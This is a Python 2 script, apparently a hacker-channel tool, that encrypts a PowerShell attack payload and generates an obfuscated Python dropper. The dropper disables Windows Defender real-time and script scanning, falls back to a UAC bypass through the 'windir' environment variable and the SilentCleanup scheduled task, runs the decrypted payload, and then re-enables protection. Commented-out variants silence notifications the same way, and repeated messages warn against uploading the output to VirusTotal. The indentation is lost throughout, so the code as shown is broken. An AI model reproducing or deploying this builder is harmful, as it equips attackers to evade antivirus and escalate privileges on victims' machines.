#!/usr/local/bin/python
# coding: latin-1
#@Author :#Captain_Nemo
from cryptography.fernet import Fernet
import os
import sys
import random
import time
import subprocess
class bcolors:
    """ANSI SGR escape sequences used to colour terminal output.

    Each attribute is a plain str holding ESC (0x1b) followed by a
    Select-Graphic-Rendition code; prepend one (or several) to a line
    and terminate with ENDC so the terminal state is reset afterwards.
    """

    # Text attributes.
    BOLD = '\x1b[1m'
    UNDERLINE = '\x1b[4m'
    # Reset all attributes and colours.
    ENDC = '\x1b[0m'

    # Bright foreground colours (9x range).
    ERROR = '\x1b[91m'      # bright red
    GREEN = '\x1b[92m'      # bright green
    WARNING = '\x1b[93m'    # bright yellow
    BLUE = '\x1b[94m'       # bright blue
    WHITE = '\x1b[97m'      # bright white
with open(sys.argv[1], 'r+') as f:
contents = f.read()
banner = '''
█████████████████████████████
█████████████████████████████
████ ▄▄▄▄▄ █ ▄ █ █ ▄▄▄▄▄ ████
████ █ █ █ ▀▀ ██ █ █ ████
████ █▄▄▄█ █▀▀█▀ █ █▄▄▄█ ████
████▄▄▄▄▄▄▄█▄▀ █▄█▄▄▄▄▄▄▄████
████▄ █▀▄ ▄██▄██▄██▄▀▄▄▄ ████
████▀▀▄▄▀ ▄▀▀ █▀█ █▀▀▀▀████
████████▄▄▄▄▀█▀█ ▄ ▀█ █████
████ ▄▄▄▄▄ █▀▄▄ █▀█▀ ▀█▄████
████ █ █ █▄█▀ ▄▀▄█▀▀▀ ▀████
████ █▄▄▄█ █▀▄█ ▄█ █▄▄▀█▀████
████▄▄▄▄▄▄▄█▄▄▄███▄██▄█▄▄████
█████████████████████████████
█████████████████████████████
'''
print banner.decode('utf-8')
print bcolors.BOLD + bcolors.WHITE + " [+] Author :#Captain_Nemo"
print bcolors.BOLD + bcolors.WHITE + " [+] HACK-ATHON BOOK OF WISDOM "
print bcolors.BOLD + bcolors.WHITE + " [+] YOUTUBE CHANNEL : https://www.youtube.com/channel/UCA1eZ38TvjtyhpLtcZ9UHEQ"
print bcolors.BOLD + bcolors.WHITE + " [+] FACEBOOK : https://www.facebook.com/Hack-Athon-BOOK-of-Wisdom-1258144607678680"
print bcolors.BOLD + bcolors.WHITE + " [+] TWITTER : https://twitter.com/AthonOf"
print bcolors.BOLD + bcolors.WHITE + " [+] GITHUB : https://github.com/1captainnemo1"
#time.sleep(3)
print "\n\n\n"
print bcolors.BOLD + bcolors.WHITE + "[+] This Module will attempt to Obfuscate powershell Attack Vectors"
print bcolors.BLUE + "[+] Raw payload"
print " ============================================================================================="
print contents
print " ============================================================================================="
print bcolors.ERROR + bcolors.BOLD + "[+] Generating Fernet MultiKey"
key = Fernet.generate_key()
print bcolors.BOLD + bcolors.WHITE + "[+] Key = " + key
print bcolors.WHITE + "[+] Please make note of the Key for decryption"
print bcolors.BOLD + "[+] Generating Fernet Object....please wait"
f = Fernet(key)
print bcolors.BOLD + bcolors.WHITE + "[+] Fernet Object Generated at :"
print f
print bcolors.ERROR + bcolors.BOLD + "[+] Encrypting Payload"
time.sleep(2)
print bcolors.BOLD + bcolors.WHITE + "================================================================================="
enc_payload = f.encrypt(contents)
print bcolors.BOLD + bcolors.WHITE + "[+] Encrypted Payload : " + enc_payload
print bcolors.BOLD + bcolors.WHITE + "================================================================================="
print bcolors.ERROR + bcolors.BOLD + "[+] Writing RAW payload to file, Please wait"
Filename = "_PSRawPayload%i"%random.randint(1,10000000001)+".txt"
#print Filename # bookmark
f1 = open("_PSRawPayload%i"%random.randint(1,10000000001)+".txt", "a")
f1.write(enc_payload)
f1.close()
print bcolors.BOLD + bcolors.WHITE + "[+] Raw Encrypted Payload written to :" + f1.name
print bcolors.BLUE + bcolors.BOLD + "[+] Do You want to continue generating the Executable payload (Y/N)"
decision = str(raw_input("enter Y or N\n"))
if decision == 'N':
print bcolors.BOLD + bcolors.WHITE + "[+] Have a nice day !!"
print bcolors.BOLD + bcolors.WHITE + "[+] DO NOT UPLOAD TO VIRUSTOTAL !!!"
sys.exit(0)
elif decision == 'Y':
# Create final Obfuscated Executable Python payload
print bcolors.BOLD + bcolors.WHITE + "[+] Generating Final Obfuscated python Payload, Please wait"
time.sleep(2)
final_payload = open("PSFinalPayload%i"%random.randint(1,10000000001)+".py", "w")
final_payload.write("""
from cryptography.fernet import Fernet
import os
import sys
import subprocess
import time
key = """ + "\'"+key+"\'")
final_payload.write("""
f_obj= Fernet(key)
enc_pay =""" "\'"+enc_payload+"\'")
final_payload.write("""
#Disable Notification
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#time.sleep(20)
#Disable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
time.sleep(90)
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()])
time.sleep(90)
#Enable AV
subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $false -DisableIOAVProtection $false -DisableRealtimeMonitoring $false -DisableScriptScanning $false}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}'])
#Enable notification
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
#subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}])
""")
final_payload.close()
print bcolors.BOLD + bcolors.WHITE + "[+] Final Encrypted encrypted Powershell Python Payload written to : " + final_payload.name
print bcolors.BLUE + bcolors.BOLD + "[+] HACK THE MULTIVERSE "
decr = 5
while True:
print bcolors.ERROR + bcolors.BOLD + "[+] DO NOT UPLOAD TO VIRUSTOTAL"
decr = decr-1
if(decr <=0):
break
sys.exit(0)
else:
sys.exit(0)
print bcolors.ERROR + bcolors.BOLD + "[+] Respond in Y or N ONLY"
sys.exit(0)